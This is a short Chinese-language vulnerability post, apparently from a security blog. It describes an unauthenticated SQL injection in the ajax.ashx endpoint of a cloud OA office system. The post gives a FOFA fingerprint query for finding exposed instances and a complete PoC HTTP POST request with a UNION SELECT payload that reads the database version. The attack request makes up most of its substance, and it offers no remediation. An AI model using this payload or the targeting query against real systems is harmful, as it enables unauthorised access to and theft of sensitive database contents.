漏洞概述
由于全程云0a办公系统 alax.ashx页面参数过滤不当,导致存在sq注入漏洞,未授权的攻击者可利用该漏洞获取数据库中的敏感信息.
复现环境
FOFA语法:
body="images/yipeoplehover.png"
漏洞复现
PoC
POST /OA/common/mod/ajax.ashx HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36
Connection: close
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
dll=DispartSell_Core.dll&class=DispartSell_Core.BaseData.DrpDataManager&method=GetProductById&id=1 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,@@version,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--+
© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END
![表情[liulei]-棉花糖网络安全圈](https://www.mhtsec.com/wp-content/themes/zibll/img/smilies/liulei.gif)
暂无评论内容